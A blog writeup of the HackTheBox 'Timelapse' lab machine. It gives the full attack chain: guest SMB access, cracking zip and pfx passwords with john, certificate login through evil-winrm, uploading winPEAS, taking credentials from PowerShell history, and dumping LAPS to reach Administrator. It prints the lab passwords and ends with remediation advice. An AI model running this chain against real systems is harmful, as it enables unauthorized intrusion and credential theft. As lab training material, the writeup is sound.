GitHub icon LinkedIn icon d="M6.667 4h18.667c1.467 0 2.667 1.2 2.667 2.667v18.667c0 1.467-1.2 2.667-2.667 2.667H6.667A2.675 2.675 0 0 1 4 25.334V6.667C4 5.2 5.2 4 6.667 4zm16.946 8.44c.64-.533 1.387-1.173 1.72-1.88-.547.28-1.2.453-1.92.547.667-.48 1.>
Writeup - Timelapse (HTB)
4 min read

Writeup - Timelapse (HTB)

Writeup - Timelapse (HTB)

This is a writeup for the Timelapse machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Many TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 8.2)
  • 80/tcp : HTTP web server (Apache 2.4.41)


First I start by listing the SMB shares with the guest account:

enum4linux -a -u "guest" -p ""

The Shares folder is available for reading, let's see what we can find in it:

We find two folders, in one of the two folders we find the file, I download it then I try to unzip it. Problem is that it is protected by a password. Let's try to crack this password with john. To do so, I start by extracting the hash with the following command:

zip2john > hash

Then I launch the dictionary attack with john with the rockyou dictionary:

Quickly I find that the password is supremelagacy. So now I can unpack the archive. In this archive I find a file with the extension .pfx. These files are used by windows to store certificates in PKCS#12 format. From this file we have the possibility to retrieve the certificate and the private key (cf. To do so, I use the following commands:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt

Problem: the certificate is also protected by a password. I test the password previously found, but without success. Once again we will have to use john to brute force the password. First I get the hash with the following command:

pfx2john legacyy_dev_auth.pfx > hashbis

Then I launch the dictionary attack with john :

I find the password thuglegacy, I can now extract the private key and the certificate. I then test to connect to the machine with these two files for authentication. For that I use evil-winrm with the following command:

evil-winrm -i -S -c cert.crt -k prv.key -p -u

I now have a shell with the legacyy user and I can get the first flag.

*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt

Privilege escalation

For the elevation of privilege I start by uploding winPEAS then I execute it :

powershell "Invoke-WebRequest -UseBasicParsing -OutFile winPEASx64.exe"

In the result of the program, I find that a file containing a command history exists on the machine:

I get it on my machine with the following command:

download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *

Looking at the contents of the file I find a user and his password!

Another thing that winPEAS teaches me is that the user svc_deploy has the right to read the LAPS passwords attribute!

The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

So I try to do it with the LAPSDumper script with the following command:

└─$ python3 Windows/ -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb

The script finds the administrator password of the machine! I can now connect with the following command:

evil-winrm -i -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M'

I now have a shell as Administrator and I can retrieve the last flag.

*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt


To patch this host I think it would be necessary to perform a number of actions:

  • Do not allow SMB shares containing important files to be accessed by unidentified users
  • Do not use weak passwords to protect certificates
  • Do not leave files with clear passwords

Owned Timelapse from Hack The Box!
I have just owned machine Timelapse from Hack The Box